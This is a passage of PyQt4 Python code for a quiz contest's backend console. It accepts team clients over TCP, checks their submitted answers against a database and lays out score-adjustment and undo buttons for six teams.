self.editGradeList = []\r\n self.btnGradeList = []\r\n self.editGradeXList = []\r\n self.btnUndoList = []\r\n\r\n self.r = refresh.dashBoard()\r\n self.r.show()\r\n\r\n self.d = display.DisplayInfo()\r\n self.d.show()\r\n\r\n self.setupServer(Dialog)\r\n self.setupUi(Dialog)\r\n\r\n def setupServer(self, Dialog):\r\n self.tcpServer = QtNetwork.QTcpServer()\r\n self.tcpServer.newConnection.connect(self.acceptConnection)\r\n self.tcpServer.listen(QtNetwork.QHostAddress.Any, 8002)\r\n\r\n def acceptConnection(self):\r\n self.tcpServerConnection = self.tcpServer.nextPendingConnection()\r\n # self.tcpServerConnection.connected.connect(self.connectSuccess)\r\n self.tcpServerConnection.readyRead.connect(self.receiveData)\r\n self.tcpServerConnection.error.connect(self.displayError)\r\n self.tcpServerConnection.disconnected.connect(self.warningDisconnection)\r\n clientDict[self.tcpServerConnection.peerAddress()] = self.tcpServerConnection\r\n\r\n def receiveData(self):\r\n connection = QtNetwork.QTcpSocket().sender()\r\n client = clientDict[connection.peerAddress()]\r\n word = client.readAll()\r\n if word == '1':\r\n client.id = '1'\r\n self.d.appendInfo('find client 1:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '2':\r\n client.id = '2'\r\n self.d.appendInfo('find client 2:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '3':\r\n client.id = '3'\r\n self.d.appendInfo('find client 3:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '4':\r\n client.id = '4'\r\n self.d.appendInfo('find client 4:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '5':\r\n client.id = '5'\r\n self.d.appendInfo('find client 5:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '6':\r\n client.id = '6'\r\n self.d.appendInfo('find client 6:(%s, %d)' % 
(client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '999':\r\n client.id = '999'\r\n self.d.appendInfo('find client 999:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n return\r\n elif word == '998':\r\n client.id = '998'\r\n self.d.appendInfo('find client 998:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n return\r\n\r\n global answerList\r\n \r\n answerList[int(client.id)-1] = word[0]\r\n mdb.addAnswerlog(currentQuestionId, answerList)\r\n if word[0] == mdb.getAnswer(currentQuestionId)[1]:\r\n self.d.appendInfo('client %s send %s, it is correct' % (client.id, word))\r\n if currentQuestionId > 20:\r\n answerList = ['Z', 'Z', 'Z', 'Z', 'Z', 'Z']\r\n return\r\n g = int(self.editGradeList[int(client.id)-1].text())\r\n self.editGradeList[int(client.id)-1].setText(str(g+10))\r\n else:\r\n self.d.appendInfo('client %s send %s, it is wrong' % (client.id, word))\r\n if currentQuestionId > 20:\r\n answerList = ['Z', 'Z', 'Z', 'Z', 'Z', 'Z']\r\n return\r\n\r\n def displayError(self, socketError):\r\n connection = QtNetwork.QTcpSocket().sender()\r\n client = clientDict[connection.peerAddress()]\r\n if socketError == QtNetwork.QTcpSocket.RemoteHostClosedError:\r\n return\r\n self.d.appendInfo(\"The following error occured: %s.\" % client.errorString()) \r\n\r\n def warningDisconnection(self):\r\n connection = QtNetwork.QTcpSocket().sender()\r\n client = clientDict[connection.peerAddress()]\r\n self.d.appendInfo(\"team%s disconnected!!!!!!!!\" % client.id)\r\n\r\n def setupUi(self, Dialog):\r\n Dialog.setWindowTitle(_translate(\"Dialog\", \"校史决赛后台控制系统 - %d\" % self.tcpServer.serverPort(), None))\r\n Dialog.setObjectName(_fromUtf8(\"Dialog\"))\r\n Dialog.setFixedSize(1000, 505)\r\n\r\n # layout\r\n self.gridLayoutWidget = QtGui.QWidget(Dialog)\r\n self.gridLayoutWidget.setGeometry(QtCore.QRect(140, 60, 851, 241))\r\n self.gridLayoutWidget.setObjectName(_fromUtf8(\"gridLayoutWidget\"))\r\n self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)\r\n self.gridLayout.setMargin(0)\r\n self.gridLayout.setObjectName(_fromUtf8(\"gridLayout\"))\r\n self.gridLayoutWidget_2 = QtGui.QWidget(Dialog)\r\n self.gridLayoutWidget_2.setGeometry(QtCore.QRect(10, 60, 111, 241))\r\n self.gridLayoutWidget_2.setObjectName(_fromUtf8(\"gridLayoutWidget_2\"))\r\n self.gridLayout_2 = QtGui.QGridLayout(self.gridLayoutWidget_2)\r\n self.gridLayout_2.setMargin(0)\r\n self.gridLayout_2.setObjectName(_fromUtf8(\"gridLayout_2\"))\r\n\r\n # 队伍编号和名称\r\n self.labelTeam1 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam1.setObjectName(_fromUtf8(\"labelTeam1\"))\r\n self.gridLayout_2.addWidget(self.labelTeam1, 0, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam1)\r\n self.labelTeam2 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam2.setObjectName(_fromUtf8(\"labelTeam2\"))\r\n self.gridLayout_2.addWidget(self.labelTeam2, 1, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam2)\r\n self.labelTeam3 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam3.setObjectName(_fromUtf8(\"labelTeam3\"))\r\n self.gridLayout_2.addWidget(self.labelTeam3, 2, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam3)\r\n self.labelTeam4 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam4.setObjectName(_fromUtf8(\"labelTeam4\"))\r\n self.gridLayout_2.addWidget(self.labelTeam4, 3, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam4)\r\n self.labelTeam5 = 
QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam5.setObjectName(_fromUtf8(\"labelTeam5\"))\r\n self.gridLayout_2.addWidget(self.labelTeam5, 4, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam5)\r\n self.labelTeam6 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam6.setObjectName(_fromUtf8(\"labelTeam6\"))\r\n self.gridLayout_2.addWidget(self.labelTeam6, 5, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam6)\r\n \r\n # 其他label\r\n self.labelTeam = QtGui.QLabel(Dialog)\r\n self.labelTeam.setGeometry(QtCore.QRect(50, 10, 54, 12))\r\n self.labelTeam.setObjectName(_fromUtf8(\"labelTeam\"))\r\n self.labelGrade = QtGui.QLabel(Dialog)\r\n self.labelGrade.setGeometry(QtCore.QRect(145, 10, 54, 12))\r\n self.labelGrade.setObjectName(_fromUtf8(\"labelGrade\"))\r\n self.labelGradePart1 = QtGui.QLabel(Dialog)\r\n self.labelGradePart1.setGeometry(QtCore.QRect(310, 40, 54, 12))\r\n self.labelGradePart1.setObjectName(_fromUtf8(\"labelGradePart1\"))\r\n self.labelGradePart2 = QtGui.QLabel(Dialog)\r\n self.labelGradePart2.setGeometry(QtCore.QRect(550, 40, 54, 12))\r\n self.labelGradePart2.setObjectName(_fromUtf8(\"labelGradePart2\"))\r\n self.labelGradeControl = QtGui.QLabel(Dialog)\r\n self.labelGradeControl.setGeometry(QtCore.QRect(520, 10, 131, 16))\r\n self.labelGradeControl.setObjectName(_fromUtf8(\"labelGradeControl\"))\r\n self.labelGradePart3 = QtGui.QLabel(Dialog)\r\n self.labelGradePart3.setGeometry(QtCore.QRect(730, 40, 54, 12))\r\n self.labelGradePart3.setObjectName(_fromUtf8(\"labelGradePart3\"))\r\n self.labelGradePart4 = QtGui.QLabel(Dialog)\r\n self.labelGradePart4.setGeometry(QtCore.QRect(850, 40, 54, 12))\r\n self.labelGradePart4.setObjectName(_fromUtf8(\"labelGradePart4\"))\r\n self.labelChooseTeam = QtGui.QLabel(Dialog)\r\n self.labelChooseTeam.setGeometry(QtCore.QRect(20, 330, 121, 16))\r\n self.labelChooseTeam.setObjectName(_fromUtf8(\"labelChooseTeam\"))\r\n self.labelShowControl = QtGui.QLabel(Dialog)\r\n self.labelShowControl.setGeometry(QtCore.QRect(20, 470, 111, 16))\r\n self.labelShowControl.setObjectName(_fromUtf8(\"labelShowControl\"))\r\n\r\n # 分数显示框\r\n self.editTeam1Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam1Grade.setObjectName(_fromUtf8(\"editTeam1Grade\"))\r\n self.gridLayout.addWidget(self.editTeam1Grade, 0, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam1Grade)\r\n self.editTeam2Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam2Grade.setObjectName(_fromUtf8(\"editTeam2Grade\"))\r\n self.gridLayout.addWidget(self.editTeam2Grade, 1, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam2Grade)\r\n self.editTeam3Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam3Grade.setObjectName(_fromUtf8(\"editTeam3Grade\"))\r\n self.gridLayout.addWidget(self.editTeam3Grade, 2, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam3Grade)\r\n self.editTeam4Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam4Grade.setObjectName(_fromUtf8(\"editTeam4Grade\"))\r\n self.gridLayout.addWidget(self.editTeam4Grade, 3, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam4Grade)\r\n self.editTeam5Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam5Grade.setObjectName(_fromUtf8(\"editTeam5Grade\"))\r\n self.gridLayout.addWidget(self.editTeam5Grade, 4, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam5Grade)\r\n self.editTeam6Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam6Grade.setObjectName(_fromUtf8(\"editTeam6Grade\"))\r\n self.gridLayout.addWidget(self.editTeam6Grade, 5, 0, 
1, 1)\r\n self.editGradeList.append(self.editTeam6Grade)\r\n \r\n # 自定义分数框\r\n self.editTeam1AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam1AddX.setObjectName(_fromUtf8(\"editTeam1AddX\"))\r\n self.gridLayout.addWidget(self.editTeam1AddX, 0, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam1AddX)\r\n self.editTeam2AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam2AddX.setObjectName(_fromUtf8(\"editTeam2AddX\"))\r\n self.gridLayout.addWidget(self.editTeam2AddX, 1, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam2AddX)\r\n self.editTeam3AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam3AddX.setObjectName(_fromUtf8(\"editTeam3AddX\"))\r\n self.gridLayout.addWidget(self.editTeam3AddX, 2, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam3AddX)\r\n self.editTeam4AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam4AddX.setObjectName(_fromUtf8(\"editTeam4AddX\"))\r\n self.gridLayout.addWidget(self.editTeam4AddX, 3, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam4AddX)\r\n self.editTeam5AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam5AddX.setObjectName(_fromUtf8(\"editTeam5AddX\"))\r\n self.gridLayout.addWidget(self.editTeam5AddX, 4, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam5AddX)\r\n self.editTeam6AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam6AddX.setObjectName(_fromUtf8(\"editTeam6AddX\"))\r\n self.gridLayout.addWidget(self.editTeam6AddX, 5, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam6AddX)\r\n\r\n # 分数控制按钮\r\n # 队伍1\r\n self.btnTeam1Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add10.setObjectName(_fromUtf8(\"btnTeam1Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add10, 0, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add10)\r\n self.btnTeam1Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add20.setObjectName(_fromUtf8(\"btnTeam1Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add20, 0, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add20)\r\n self.btnTeam1Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Sub15.setObjectName(_fromUtf8(\"btnTeam1Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam1Sub15, 0, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Sub15)\r\n self.btnTeam1Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add15.setObjectName(_fromUtf8(\"btnTeam1Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add15, 0, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add15)\r\n self.btnTeam1Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add25.setObjectName(_fromUtf8(\"btnTeam1Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add25, 0, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add25)\r\n self.btnTeam1Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add35.setObjectName(_fromUtf8(\"btnTeam1Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add35, 0, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add35)\r\n self.btnTeam1AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1AddX.setObjectName(_fromUtf8(\"btnTeam1AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam1AddX, 0, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1AddX)\r\n self.btnTeam1Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add3.setObjectName(_fromUtf8(\"btnTeam1Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add3, 0, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add3)\r\n # 队伍2\r\n self.btnTeam2Add10 = 
QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add10.setObjectName(_fromUtf8(\"btnTeam2Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add10, 1, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add10)\r\n self.btnTeam2Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add20.setObjectName(_fromUtf8(\"btnTeam2Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add20, 1, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add20)\r\n self.btnTeam2Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Sub15.setObjectName(_fromUtf8(\"btnTeam2Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam2Sub15, 1, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Sub15)\r\n self.btnTeam2Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add15.setObjectName(_fromUtf8(\"btnTeam2Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add15, 1, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add15)\r\n self.btnTeam2Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add25.setObjectName(_fromUtf8(\"btnTeam2Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add25, 1, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add25)\r\n self.btnTeam2Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add35.setObjectName(_fromUtf8(\"btnTeam2Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add35, 1, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add35)\r\n self.btnTeam2AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2AddX.setObjectName(_fromUtf8(\"btnTeam2AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam2AddX, 1, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2AddX)\r\n self.btnTeam2Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add3.setObjectName(_fromUtf8(\"btnTeam2Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add3, 1, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add3)\r\n # 队伍3\r\n self.btnTeam3Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add10.setObjectName(_fromUtf8(\"btnTeam3Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add10, 2, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add10)\r\n self.btnTeam3Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add20.setObjectName(_fromUtf8(\"btnTeam3Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add20, 2, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add20)\r\n self.btnTeam3Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Sub15.setObjectName(_fromUtf8(\"btnTeam3Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam3Sub15, 2, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Sub15)\r\n self.btnTeam3Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add15.setObjectName(_fromUtf8(\"btnTeam3Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add15, 2, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add15)\r\n self.btnTeam3Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add25.setObjectName(_fromUtf8(\"btnTeam3Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add25, 2, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add25)\r\n self.btnTeam3Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add35.setObjectName(_fromUtf8(\"btnTeam3Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add35, 2, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add35)\r\n self.btnTeam3AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3AddX.setObjectName(_fromUtf8(\"btnTeam3AddX\"))\r\n 
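# the "+X" button for team 3 goes in grid column 8; createGradeX relabels it with the amount typed into editTeam3AddX\r\n        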
self.gridLayout.addWidget(self.btnTeam3AddX, 2, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3AddX)\r\n self.btnTeam3Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add3.setObjectName(_fromUtf8(\"btnTeam3Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add3, 2, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add3)\r\n # 队伍4\r\n self.btnTeam4Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add10.setObjectName(_fromUtf8(\"btnTeam4Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add10, 3, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add10)\r\n self.btnTeam4Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add20.setObjectName(_fromUtf8(\"btnTeam4Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add20, 3, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add20)\r\n self.btnTeam4Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Sub15.setObjectName(_fromUtf8(\"btnTeam4Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam4Sub15, 3, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Sub15)\r\n self.btnTeam4Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add15.setObjectName(_fromUtf8(\"btnTeam4Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add15, 3, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add15)\r\n self.btnTeam4Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add25.setObjectName(_fromUtf8(\"btnTeam4Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add25, 3, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add25)\r\n self.btnTeam4Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add35.setObjectName(_fromUtf8(\"btnTeam4Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add35, 3, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add35)\r\n self.btnTeam4AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4AddX.setObjectName(_fromUtf8(\"btnTeam4AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam4AddX, 3, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4AddX)\r\n self.btnTeam4Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add3.setObjectName(_fromUtf8(\"btnTeam4Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add3, 3, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add3)\r\n # 队伍5\r\n self.btnTeam5Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add10.setObjectName(_fromUtf8(\"btnTeam5Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add10, 4, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add10)\r\n self.btnTeam5Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add20.setObjectName(_fromUtf8(\"btnTeam5Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add20, 4, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add20)\r\n self.btnTeam5Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Sub15.setObjectName(_fromUtf8(\"btnTeam5Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam5Sub15, 4, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Sub15)\r\n self.btnTeam5Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add15.setObjectName(_fromUtf8(\"btnTeam5Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add15, 4, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add15)\r\n self.btnTeam5Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add25.setObjectName(_fromUtf8(\"btnTeam5Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add25, 4, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add25)\r\n self.btnTeam5Add35 = 
QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add35.setObjectName(_fromUtf8(\"btnTeam5Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add35, 4, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add35)\r\n self.btnTeam5AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5AddX.setObjectName(_fromUtf8(\"btnTeam5AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam5AddX, 4, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5AddX)\r\n self.btnTeam5Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add3.setObjectName(_fromUtf8(\"btnTeam5Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add3, 4, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add3)\r\n # 队伍6\r\n self.btnTeam6Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add10.setObjectName(_fromUtf8(\"btnTeam6Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add10, 5, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add10)\r\n self.btnTeam6Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add20.setObjectName(_fromUtf8(\"btnTeam6Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add20, 5, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add20)\r\n self.btnTeam6Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Sub15.setObjectName(_fromUtf8(\"btnTeam6Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam6Sub15, 5, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Sub15)\r\n self.btnTeam6Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add15.setObjectName(_fromUtf8(\"btnTeam6Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add15, 5, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add15)\r\n self.btnTeam6Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add35.setObjectName(_fromUtf8(\"btnTeam6Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add35, 5, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add35)\r\n self.btnTeam6Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add25.setObjectName(_fromUtf8(\"btnTeam6Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add25, 5, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add25)\r\n self.btnTeam6AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6AddX.setObjectName(_fromUtf8(\"btnTeam6AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam6AddX, 5, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6AddX)\r\n self.btnTeam6Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Add3.setObjectName(_fromUtf8(\"btnTeam6Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam6Add3, 5, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam6Add3)\r\n \r\n # 撤销按钮\r\n self.btnTeam1Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Undo.setObjectName(_fromUtf8(\"btnTeam1Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam1Undo, 0, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam1Undo)\r\n self.btnTeam2Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Undo.setObjectName(_fromUtf8(\"btnTeam2Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam2Undo, 1, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam2Undo)\r\n self.btnTeam3Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Undo.setObjectName(_fromUtf8(\"btnTeam3Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam3Undo, 2, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam3Undo)\r\n self.btnTeam4Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Undo.setObjectName(_fromUtf8(\"btnTeam4Undo\"))\r\n 
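# team 4's undo button goes in the shared undo column (10); undo buttons start disabled and are enabled by updateGrade\r\n        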
self.gridLayout.addWidget(self.btnTeam4Undo, 3, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam4Undo)\r\n self.btnTeam5Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Undo.setObjectName(_fromUtf8(\"btnTeam5Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam5Undo, 4, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam5Undo)\r\n self.btnTeam6Undo = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam6Undo.setObjectName(_fromUtf8(\"btnTeam6Undo\"))\r\n self.gridLayout.addWidget(self.btnTeam6Undo, 5, 10, 1, 1)\r\n self.btnUndoList.append(self.btnTeam6Undo)\r\n\r\n # 华丽的分割线\r\n self.line = QtGui.QFrame(Dialog)\r\n self.line.setGeometry(QtCore.QRect(0, 300, 1021, 16))\r\n self.line.setFrameShape(QtGui.QFrame.HLine)\r\n self.line.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line.setObjectName(_fromUtf8(\"line\"))\r\n self.line_2 = QtGui.QFrame(Dialog)\r\n self.line_2.setGeometry(QtCore.QRect(10, 90, 981, 20))\r\n self.line_2.setFrameShape(QtGui.QFrame.HLine)\r\n self.line_2.setFrameShadow(QtGui.QFrame.Sunken)\r\n self.line_2.setObjectName(_fromUtf8(\"line_2\"))\r\n self.line_3 = QtGui.QFrame(Dialog)\r\n self.line_3.setGeometry(QtCore.QRect(10, 130, 981, 20))\r\n self.line_3.setFrameShape(QtGui.QFrame.HLine)\r\n 